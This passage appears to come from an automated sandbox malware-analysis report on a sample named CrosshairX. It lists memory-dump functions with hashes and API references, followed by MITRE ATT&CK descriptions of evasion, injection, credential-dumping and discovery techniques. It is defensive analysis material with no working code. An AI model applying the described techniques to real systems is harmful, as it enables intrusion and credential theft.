Opcode ID: 1ecbc608e89e031ed0d7971594afd6d05dfe01a1ac7fa897887ca28a6ef3d5ae
Instruction ID: e6a960ac80d4aa6c5e470ca6c5279039fbb21b0d6f2a00ab65937ce219abcdf4
Opcode Fuzzy Hash: 1ecbc608e89e031ed0d7971594afd6d05dfe01a1ac7fa897887ca28a6ef3d5ae
Instruction Fuzzy Hash: 9681D737B15A9047C71C893D4C622AAE9535BDB330B3E937FB5B59B3E5CE2988024394

Function 0041C8BF Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c6de7c3751fa98ec00d6bb7935774a2dcdb90e0df00f208a73702013050e16
Instruction ID: 6ed5ab7214f5fa19df0b105e1b8f0fafd615531bf27a55d8eecdf5edb55b8f51
Opcode Fuzzy Hash: 98c6de7c3751fa98ec00d6bb7935774a2dcdb90e0df00f208a73702013050e16
Instruction Fuzzy Hash: 2961F2B15483508BD724CF24C8E23ABBBE1EF92354F58685DE4C68B391E7799841CB86

Function 00432413 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d9dbaeb507909522159e097d664c4cc06b0076ff3294745eb78e692a73af698
Instruction ID: 917dde71f18fdc27907b0002e0b2394690bff501da3c2d0f6c824c5f78e5f6fb
Opcode Fuzzy Hash: 4d9dbaeb507909522159e097d664c4cc06b0076ff3294745eb78e692a73af698
Instruction Fuzzy Hash: 37712432A493D08BD334CF25C9957DBBAD2ABD6304F18C56DC4C99B396CBB85506CB82

Function 0041FD70 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838994712f8301802770d5a3ba9cfdeb956b34d252de8da315c07417c0774330
Instruction ID: 51896704639a4cc1f725e99550202757941d42f1e4cd8935be281f977c3f9d9b
Opcode Fuzzy Hash: 838994712f8301802770d5a3ba9cfdeb956b34d252de8da315c07417c0774330
Instruction Fuzzy Hash: 8F6148356083905FC3258F29D880A6A7BE1AF96314F0882BFE8D84B392D675DC4AC756

Function 0041B840 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 934946f554ad58484ed2ed14e1f7e50a994b73d75b2e9ad314203944e43854c8
Instruction ID: 10352496125040f50b9699e443cd7ed61600c7c0f687488d046d77c5f769f467
Opcode Fuzzy Hash: 934946f554ad58484ed2ed14e1f7e50a994b73d75b2e9ad314203944e43854c8
Instruction Fuzzy Hash: CD51373665898047E7288A3C4C213AA6A838FD7330B3DC36FE5F5C73E1DA5948428385

Function 0043D1D0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ecf6f3a089e5684cd928829dbe7b8bb57aa7aad23655412cdb283b80ae6efd3
Instruction ID: 4bb6dcd7470822aacb967d3d7b829ef58f36a54b71d8707197abe380ba79133b
Opcode Fuzzy Hash: 1ecf6f3a089e5684cd928829dbe7b8bb57aa7aad23655412cdb283b80ae6efd3
Instruction Fuzzy Hash: AA515DB59087548FE314DF69D49435BBBE1BBC8318F044E2EE4E987350E379DA088B96

Function 004296AB Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b78a67225f0ff1aaedcf4193328401902f4751f8219e37ab98aedf65dbd7aabd
Instruction ID: fc3fbd60eec558a8a12180bc577d63112baeae34fd98d04c390aaa22a0c364b6
Opcode Fuzzy Hash: b78a67225f0ff1aaedcf4193328401902f4751f8219e37ab98aedf65dbd7aabd
Instruction Fuzzy Hash: 5D516B316186628BC714CA28D4912BBF7D2EF95350F99862FD4958B381E37CDC16E38A

Function 00408E10 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a052206fc8cd0cba7b8eb45afaf1f47082f738554b1f690b1680a718490d35
Instruction ID: 48874c27c8534773aec939b37bfda30cf2c77197c4d733c1f187dec09a678d74
Opcode Fuzzy Hash: 10a052206fc8cd0cba7b8eb45afaf1f47082f738554b1f690b1680a718490d35
Instruction Fuzzy Hash: CE516F626083468FD7144A788901377FB92EBD6310F19877EE6C86F3C2D9389946D3DA

Function 0041A368 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20df83b1734cb7839b9a451c0afbb672384aa0a76882f5721a5255aeef406e3a
Instruction ID: b902612079553ae75879401b212b4336e48d3d7f084eecbc730cffc74336d4bc
Opcode Fuzzy Hash: 20df83b1734cb7839b9a451c0afbb672384aa0a76882f5721a5255aeef406e3a
Instruction Fuzzy Hash: 4A4126715063414BC728CF38C8557AFB3E1EFD2324F19866ED8D68B395E73888458746

Function 0042C44F Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8e71617bc956541105803b924152801e8b212d5bb4f73ac25c6d3be970d612d
Instruction ID: c868a69575d8d1b97fb8a50a0803436a0aed4b6a91c239aae9ece050f534f435
Opcode Fuzzy Hash: a8e71617bc956541105803b924152801e8b212d5bb4f73ac25c6d3be970d612d
Instruction Fuzzy Hash: F151AAB5A48311CAD320DF14D89176BB7F1FFD5304F04882EE9898B3A1E7789949CB5A

Function 0040F15C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ed8a715ea5a47eef7924ef3013838540f2eb7f5106c4f9c5142feb7cacad743
Instruction ID: 390020018c3c5e7e8a0b2007a547811b0aefdf291c155bc881d083d900de85c5
Opcode Fuzzy Hash: 4ed8a715ea5a47eef7924ef3013838540f2eb7f5106c4f9c5142feb7cacad743
Instruction Fuzzy Hash: 325112B4101B019FE3248F56C595312BBA1FF44308F249AACD55A5FB96D3BAE42BCF84

Function 0043EEC0 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae18095a005500642c9f8c9fa8dfbe12ffa5fd8247430f0a405e74d14088365b
Instruction ID: db388443774a2de8cd798de7d59426589eb53ecb7480dc7ec9f3314114f2c927
Opcode Fuzzy Hash: ae18095a005500642c9f8c9fa8dfbe12ffa5fd8247430f0a405e74d14088365b
Instruction Fuzzy Hash: AD318EB1904300ABE714AF25DC41B2BB7E9EF4834CF20583EF98557292E376DC158B9A

Function 0043F040 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 801438be49255d5ed980ee85ad902960079173a7823937c0c3d5aff0168e6ed7
Instruction ID: 045b38dc96cd68d68d3bfa876b6708866589d76a215eb50092e024ee2b037119
Opcode Fuzzy Hash: 801438be49255d5ed980ee85ad902960079173a7823937c0c3d5aff0168e6ed7
Instruction Fuzzy Hash: 8941EB33A197144BD7185D7C8C8016B7A929BC5330F2A873EEAB5873C6DA794D059385

Function 0041E930 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3c6426cedcd36b5c6fb370833f63ee8a515e29ccb2184de362fb99b20e13246
Instruction ID: d3a463d4382216d07c714c120fc87cc0bbd9e551c4ba6201f609969bf1b87cad
Opcode Fuzzy Hash: f3c6426cedcd36b5c6fb370833f63ee8a515e29ccb2184de362fb99b20e13246
Instruction Fuzzy Hash: 8B41E4741083419BE7109F29D81AB6FFBE1AFD2718F14CE2CF4D49B2D2D67988898746

Function 00402BA0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bacaad6b53cc8d42b2c4a1489d8046ab64c981014e466bcc6b9dbba8272d34b
Instruction ID: a1e02aea24fe66900686fc67ee0e6b8e5cf68ae9e83eda1cca0cb9ff40034b1d
Opcode Fuzzy Hash: 0bacaad6b53cc8d42b2c4a1489d8046ab64c981014e466bcc6b9dbba8272d34b
Instruction Fuzzy Hash: 7621273675D1B107D7008E789DD81AB779297D731576E4176DAC0E3392C2B9E80BC264

Function 0042A450 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a685271c69a6ba9bafc3c7d0e52255275d5b223479939583e8f18743f2b9000
Instruction ID: 462cbdded15946fb105f25f1143bbc0dd74b91ea12c69bc5ad0cccd8b1962754
Opcode Fuzzy Hash: 6a685271c69a6ba9bafc3c7d0e52255275d5b223479939583e8f18743f2b9000
Instruction Fuzzy Hash: CD2189B15197809BE3009F65E99975FFFE5ABC2318F50192CF1D08B291C7B9C449CB86

Function 0043AC30 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: aa518f50a9947ab61fc2d1eca0895abb810a5a9c934b7b841ac88002b580a728
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 2111E933A451D40FC3168D3C8400565BFA31AA7635F59A39AF4F49B3D2D62B8D8A835A

Function 0042DCA0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d467632780101c4e60e7de00bde26baebd034e87bccc790348d457ee9c2bc29
Instruction ID: 8b8d9dc6570c03ef0631d2f608d6abe9841e2780262978d6d163338e23d99437
Opcode Fuzzy Hash: 4d467632780101c4e60e7de00bde26baebd034e87bccc790348d457ee9c2bc29
Instruction Fuzzy Hash: BF01B5F1F0071147E720AE16F5C0B27B2A86F88718F58003ED8455B342DBB9EC05D299

Function 0041BD50 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2720d0126c1c4da0505db82eb123a33ffc9901fad4f5ee8188657bce0c229a2c
Instruction ID: 5d09ade4d27731b855a828df0a37a218fe1c294cc643004c6bdd20f937b806c0
Opcode Fuzzy Hash: 2720d0126c1c4da0505db82eb123a33ffc9901fad4f5ee8188657bce0c229a2c
Instruction Fuzzy Hash: 8A01CC301083818EE765CF3994643ABBBE1DBD3314F54999DE0D2A72A2C738D44AC786

Function 0042CA41 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dddf4cba9efa6599ac27263320a33349d9e83660c382adf05c88f4481b5b2c64
Instruction ID: 1b6814549eb502c8d20d47ef82730301c4808dfa2e83aa925a2cdeaf3ec08304
Opcode Fuzzy Hash: dddf4cba9efa6599ac27263320a33349d9e83660c382adf05c88f4481b5b2c64
Instruction Fuzzy Hash: 3D01F774B00415EEF228DB28EC9273E7396FB43364FF44267E412061A1D3345C6A858D

Function 00441740 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 381c6d00fb47937e56bb9ff0770db15678d08ad7ec56fd8b6c183323fbb70b92
Instruction ID: 56bcd41ec2ab57b62f0a616963d4c35cdfca696d82230f0655d359a77bca8461
Opcode Fuzzy Hash: 381c6d00fb47937e56bb9ff0770db15678d08ad7ec56fd8b6c183323fbb70b92
Instruction Fuzzy Hash: 74F0F47A910208ABF2105B46DC40D3773AEEBCE7A8F10032AF414122B1E322ED6187A9

Function 0040D520 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5565e34b504cc6b81b7665d5a2851cbc9f934250eef17533e2f2ce563de15709
Instruction ID: d30e8fa09c958a41b2679b1a81ef8b437515b8a4af321cb086c4342efa0ba9d4
Opcode Fuzzy Hash: 5565e34b504cc6b81b7665d5a2851cbc9f934250eef17533e2f2ce563de15709
Instruction Fuzzy Hash: 88F0D174808940AFD71A9B299C11A327762FF42388F68516DE442AB6E2C334FC248B59

Function 0042CC9C Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce89e76dab09c24f10ab4f03561a638ff6d50ff5a457efce6b3afa548bbcc66c
Instruction ID: d0ed24ef873716a74c24401ab6133aacff7ce70a8ee86ff9c13d2baacc2a9bcc
Opcode Fuzzy Hash: ce89e76dab09c24f10ab4f03561a638ff6d50ff5a457efce6b3afa548bbcc66c
Instruction Fuzzy Hash: 5CE01238704515CBC718DF56E99133FB3F2BB8B701B99907984035B620D334EC0A868D

Function 0041FFE0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9f89bc5d49024418ebaac0d6223f42d2556c6a5f22dbd203d69d6cbbeed48b5
Instruction ID: a3df7ea2e4136154b6dee8b9aa0e05c5458aa9b19ca034cc8434a7f2951a06a4
Opcode Fuzzy Hash: e9f89bc5d49024418ebaac0d6223f42d2556c6a5f22dbd203d69d6cbbeed48b5
Instruction Fuzzy Hash: FDD05B115457B00E5255CD2454905B7B7FA9787116B5C645FD8D5D3205C129D8065618

Function 0042BE80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042BF4F
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042BFDE

Strings

2TUJ, xrefs: 0042BEAA

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 2TUJ
API String ID: 237503144-1091987653
Opcode ID: 386033cf37a69d72ffe892673ecd413527d1f9fb705d3bc84bcd7a1b1714a732
Instruction ID: 283ec9918664ffccea628fd17701563cb1e54820b66d976a4c19bec13597d94b
Opcode Fuzzy Hash: 386033cf37a69d72ffe892673ecd413527d1f9fb705d3bc84bcd7a1b1714a732
Instruction Fuzzy Hash: B941227564C3148BD324CF24DC41BAFBBE6EB82308F09C93DE5959B6C1C775940A8B86

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

